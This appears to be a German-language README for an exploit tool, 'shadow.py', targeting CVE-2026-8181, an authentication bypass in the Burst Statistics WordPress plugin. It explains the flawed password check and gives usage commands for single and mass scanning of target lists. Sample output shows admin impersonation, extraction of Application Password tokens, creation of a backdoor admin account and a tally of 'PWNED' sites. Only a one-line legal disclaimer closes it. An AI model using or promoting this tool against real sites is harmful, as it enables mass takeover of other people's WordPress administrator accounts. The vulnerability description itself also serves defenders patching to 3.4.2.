
CVE-2026-8181 | Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover
Burst Statistics | Umgehung der Authentifizierung zur Übernahme des Admin-Kontos
Burst Statistics 3.4.0 - 3.4.1.1 - Umgehung der Authentifizierung zur Übernahme des Admin-Kontos
Das Burst Statistics – Privacy-Friendly WordPress Analytics (Google Analytics Alternative) Plugin für WordPress ist in den Versionen 3.4.0 bis 3.4.1.1 anfällig für eine Authentifizierungsumgehung. Dies liegt an einer fehlerhaften Rückgabewertbehandlung in der Funktion is_mainwp_authenticated() bei der Validierung von Application Passwords aus dem Authorization-Header. Die Funktion ruft wp_authenticate_application_password(null, $username, $password) auf, die null (nicht WP_Error) zurückgibt, wenn der Zielbenutzer keine Application Passwords konfiguriert hat. Da der Code nur is_wp_error() prüft, fährt er fort und ruft wp_set_current_user() auf – was dem Angreifer für die gesamte Anfrage volle Administratorrechte gewährt.
Die Umgehung wird während plugins_loaded (Priorität 9) über has_admin_access() im Bootstrap des Plugins ausgelöst, was bedeutet, dass die Benutzerimitation bevor die WordPress REST API irgendeine Route ausliefert, stattfindet – was den Zugriff auf alle WP Core Endpoints (/wp/v2/users, /wp/v2/users/me, usw.) als Administrator ermöglicht.
Dies ermöglicht es nicht authentifizierten Angreifern, die einen Administrator-Benutzernamen kennen, diesen Administrator zu imitieren, indem sie ein beliebiges zufälliges Basic-Authentication-Passwort angeben, wodurch eine vollständige Privilegieneskalation und Übernahme des Admin-Kontos erreicht wird.
~ CVSS Score: 9.8 (Kritisch)
~ CVSS-Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
~ Betroffene Versionen: 3.4.0 - 3.4.1.1
~ Behobene Version: 3.4.2
Einzelziel :
python3 shadow.py -u https://target.comEinzelziel mit bekanntem Benutzernamen :
python3 shadow.py -u https://target.com -U adminMassenziele :
python3 shadow.py -f targets.txt -t 20Interaktiver Modus :
python3 shadow.py/burst/v1/mainwp-auth)
╔══════════════════════════════════════════════════════╗
║ 🔥 CVE-2026-8181 Burst Statistics Auth Bypass ║
║ 👩💻 Friska & Shadow | Route Check | Full Fallback ║
║ 🎯 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output ║
╚══════════════════════════════════════════════════════╝
[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS → admin (id=1, admin=True)
[+] Application Password token extracted!
[💀] USER CREATED: shadow / R4nd0mP@ss!
[💀] TAKEOVER VERIFIED via wp-login.php!
[💀] SUCCESS! http://target.com/wp-admin/
⚡ MASS SCAN: 50 targets | 20 threads
────────────────────────────────────────────────────────────
[💀] [1/50] http://target1.com → PWNED!
[💀] [2/50] http://target2.com → PWNED!
[☠️] [3/50] http://target3.com → DEAD
[-] [4/50] http://target4.com → SECURED
[!] [5/50] http://target5.com → PATCHED
────────────────────────────────────────────────────────────
╔══════════════════════════════════╗
║ 📊 SCAN SUMMARY ║
╠══════════════════════════════════╣
║ 💀 PWNED: 12 ║
║ ☠️ DEAD: 8 ║
║ 🔒 SECURED: 5 ║
║ ⚠️ PATCHED: 15 ║
║ ❌ FAILED: 10 ║
╠══════════════════════════════════╣
║ Total: 50 ║
╚══════════════════════════════════╝
[+] 📁 user.txt | token.txt | new-user-and-header.txt
Die unbefugte Nutzung von Systemen, die Ihnen nicht gehören oder für die Sie keine Testberechtigung haben, ist illegal.